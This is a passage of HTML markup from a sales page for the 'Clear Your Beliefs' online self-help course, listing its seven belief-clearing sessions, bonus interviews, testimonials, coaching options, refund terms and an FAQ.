with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body. \r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional Support On Your Journey Into Your Subconscious</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>You can easily take this journey on your own, one recorded session at a time. You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.  \r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, in any part of your life, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. Your coach will meet with you by phone (or Skype) each week, at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you best - from the recorded program-only, to full support each week.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a 